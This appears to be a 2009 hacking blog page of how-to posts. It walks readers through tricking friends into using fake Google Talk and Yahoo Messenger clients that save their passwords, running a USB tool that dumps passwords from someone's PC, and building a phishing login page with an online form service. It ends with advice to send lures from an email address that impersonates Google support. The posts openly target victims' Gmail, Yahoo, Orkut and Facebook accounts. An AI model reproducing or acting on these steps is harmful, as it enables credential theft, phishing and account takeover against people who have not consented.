You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Monday, June 29, 2009

Fake Gtalk and fake yahoo messenger!

Fake GTalk or google talk,This is one of the hacking trick to hack GTalk passwords, if ur successful in hacking his/her GTalk password & u can get Orkut & Gmail passwords also, actually this is the fake GTalk whenever anyone login in this GTalk his GTalk ID and Passwords are saved in ur system...

Steps:

Step 1 - Install Microsoft .NET Framework.(I think almost everyone has this in their computers if don't click here to download )

Step 2 - click here to get fake GTalk.

Step 3 - Tell any of ur friends to login, try to fish them by saying this is the new version of GTalk try it!!!

Step 4 - Open C:\google talk.txt & dats ur frnds GTalk id & passwords..

Fake Yahoo messenger

Step 1 - Install Microsoft .NET Framework

Step 2 - click here to get fake yahoo messenger

Step 3 - Rename that YPager as Yahoo Messenger.

Step 4 - Tell any of ur friends to login, try to fish them by saying this is the new version of yahoo try it!!!

Step 5 - Open C:\yahoo.txt & dats ur frnds yahoo id & passwords..

Tags:hack hack a website hack account hack accounts hack bot hack cheats hack code hack codes hack email hack forum hack game hack gmail hack hotmail hack hotmail passwords hack id hack infection hack into hack it hack msn hack online hack passwords hack programs hack site hack


Sunday, May 3, 2009

Hack a PC by USB..


Website counter




Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

Download this software:

http://www.mediafire.com/?f3ddzyenlug

  1. Extract it.
  2. open pcinfo
  3. select all the files and paste it in ur USB(pendrive)
  4. it in the pc u wanna hack...
  5. Open the USB drive, give it 2 sec and and ur job is done...

And now open the dump folder in ur pc and u will have all the info u want...

Hack any gmail,yahoo,msn,orkut,hotmail,facebook or any other account!!!

This is a very simple basic but the quickest trick of all.

It is actually called phishing.
The main concept is that you have to make a page in which the your victim enters his login details. And instead of logging in he actually is SENDING YOU HIS PASSWORD TO YOUR EMAIL!!!

Now let’s learn how to create your very own fake login page.

{1} Open www.jotform.com and Sign Up.

{2} then Login there with your newly registered account.

{3} now click on ‘ Create your first form’.

{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)

{6} Now Click on ‘Power Tool’ Option (In right hand side…)

{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’

{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)

{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.

{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.

{13} Now open Notepad text editor and write the following code their.


NOW YOU HAVE THE HTML CODE WHICH IS TO BE UPLOADED TO SOME SITE OF YOUR OWN .THERE ARE MANY SITES THROUGH WHICH YOU CAN DO THIS LIKE www.piczo.com , www.tripod.com., or you could even use blogger itself!!!

After hosting the page just make your victim login through it and then you will get his password !

But how will you do that? I have an answer for that too! Just make an e-mail id which looks like an official id like googlesupport@gmail.com and send a mail to your victim saying that his /her account will expire if he/she doesn't login through the link you have made .